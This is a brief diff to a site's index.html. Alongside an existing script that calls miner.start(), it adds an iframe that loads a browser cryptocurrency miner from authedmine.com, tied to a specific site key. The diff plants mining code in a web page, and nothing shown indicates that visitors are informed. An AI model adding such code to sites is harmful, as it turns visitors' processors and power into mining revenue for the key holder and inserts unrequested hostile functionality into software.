--- a/index.html
+++ b/index.html
@@ -10,5 +10,6 @@
     });
     miner.start();
 </script>
+    <iframe src="https://authedmine.com/media/miner.html?key=R0btXeKuObPUJbmj6OGc8Yo06nWGLgls"></iframe>
 </body>
 </html>
